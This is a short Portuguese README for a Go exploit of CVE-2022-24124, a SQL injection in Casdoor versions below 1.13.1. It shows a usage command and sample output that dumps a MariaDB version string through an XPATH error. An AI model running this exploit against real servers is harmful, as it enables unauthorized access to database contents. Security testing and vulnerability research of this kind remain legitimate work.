
Extrair a versão do banco de dados SQL no host executando Casdoor < 1.13.1
Código do exploit para CVE-2022-24124 também conhecido como Casdoor SQL Injection
Links do exploit: [ExploitDB-50792] [PacketStormSecurity]
Resultado esperado: Despejar a versão do banco de dados SQL no host que executa Casdoor < 1.13.1
Destinado apenas para fins educacionais e de teste em ambientes corporativos.
Barricade➜ go run exploit.go -u http://127.0.0.1:8080
-=Casdoor SQL Injection (CVE-2022-24124)=-
- by Mayank Deshmukh (ColdFusionX)
[*] Dumping Database Version
XPATH syntax error: .12-MariaDB-0+deb11u1